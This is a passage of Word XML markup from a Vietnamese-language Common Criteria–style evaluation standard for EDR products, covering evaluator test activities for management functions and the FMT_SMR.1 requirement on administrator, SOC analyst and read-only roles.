      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Yêu cầu này bao gồm tất cả chức năng cấu hình mà EDR cung cấp cho quản trị viên để cấu hình Tác nhân máy chủ EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0581C77C" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hoạt động đánh giá:</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789"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w14:paraId="69C046E3" w14:textId="77777777" w:rsidTr="00204C5F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ECEA2BB" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3845D319" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hoạt động đảm bảo </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w14:paraId="0B1BFE12" w14:textId="77777777" w:rsidTr="00204C5F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="106C6662" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A07101" w14:textId="7ACE2C25" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Đánh giá viên phải </w:t>
            </w:r>
            <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>phải xác minh TSS có chứa danh sách các vai trò và những chức năng nào có thể thực hiện. Đánh giá viên phải xác minh danh sách khớp với khung yêu cầu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w14:paraId="2FAED4A9" w14:textId="77777777" w:rsidTr="00204C5F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BEEAFB0" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED6C0CA" w14:textId="0893DA80" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Đánh giá viên </w:t>
            </w:r>
            <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>phải xem xét hướng dẫn vận hành để xác minh rằng EDR có các khả năng được lập thành văn bản để thực hiện các chức năng quản lý.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w14:paraId="2008D5ED" w14:textId="77777777" w:rsidTr="00204C5F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6121119D" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CAD930B" w14:textId="16042B22" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải thực hiện các bài kiểm tra dưới đây</w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39EEF320" w14:textId="20AB66C8" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>phải sửa đổi khung thời gian gửi dữ liệu của Tác nhân máy chủ tới EDR và xác minh rằng Tác nhân máy chủ bị ảnh hưởng đang gửi dữ liệu theo khoảng thời gian đã xác định.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF1DC35" w14:textId="66791266" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải</w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>gắn thẻ hoặc phân loại một nhóm các hệ thống điểm cuối riêng lẻ và xác minh rằng thẻ hoặc phân loại vẫn tồn tại trong bảng điều khiển quản lý EDR của những người dùng khác.</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F999EF7" w14:textId="6B568BC4" w:rsidR="00A35DB0" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 3</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Đánh giá viên phải </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>thử từng chức năng với từng vai trò và xác minh quyền truy cập phù hợp với khung yêu cầu.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03744F0A" w14:textId="0304D669" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0863655D" w14:textId="2B76DAD1" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9.3.3.</w:t>
      </w:r>
      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> FMT_SM</w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vai trò quản lý </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6834656B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>FMT_SMR.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23A266" w14:textId="0ABAC869" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tinh chỉnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> phải duy trì vai trò [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">quản trị viên, </w:t>
      </w:r>
      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>chuyên gia phân tích</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOC, </w:t>
      </w:r>
      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>người đọc</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B19E572" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>FMT_SMR.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83F758" w14:textId="5A8AA85D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tinh chỉnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> có </w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>khả năng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> liên kết người dùng với vai trò.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B4B5E6" w14:textId="4C9CB169" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  EDR </w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> được cấu hình, duy trì và sử dụng bởi các vai trò người dùng khác nhau. Tối thiểu, một vai trò quản trị </w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> được hỗ trợ, một </w:t>
      </w:r>
      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>chuyên gia phân tích</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOC có thể ban hành lệnh khắc phục cho các </w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tác nhân máy chủ</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> và một người dùng chỉ được phép đọc chỉ có thể xem dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB3049B" w14:textId="21BE8107" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Tài khoản người dùng không cần phải được đặt tên theo </w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nội dung</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, nhưng phải có ý nghĩa của các vai trò </w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>theo phân quyền</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C49629" w14:textId="6F62EC89" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">CC Phần 2 chỉ định FIA_UID.1 là sự phụ thuộc của yêu cầu này vì TSF phải có một số cách để xác định người dùng để họ có thể được liên kết với vai trò quản lý. Sự phụ thuộc này được giải quyết thông qua FIA_AUT_EXT.1, trong đó chỉ định một phương pháp </w:t>
      </w:r>
      <w:r w:rsidR="00475C38" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>định danh</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> người dùng thay thế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC1734C" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hoạt động đánh giá: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42"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="43CC11B9" w14:textId="77777777" w:rsidTr="00C42841">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5170DA43" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7942" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71722A42" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Hoạt động đảm bảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="1F1336ED" w14:textId="77777777" w:rsidTr="00C42841">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06D0C7D8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7942" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="128F5096" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra TSS để xác minh rằng nó mô tả vai trò và quyền hạn được cấp và hạn chế của vai trò.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="7759BE61" w14:textId="77777777" w:rsidTr="00C42841">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
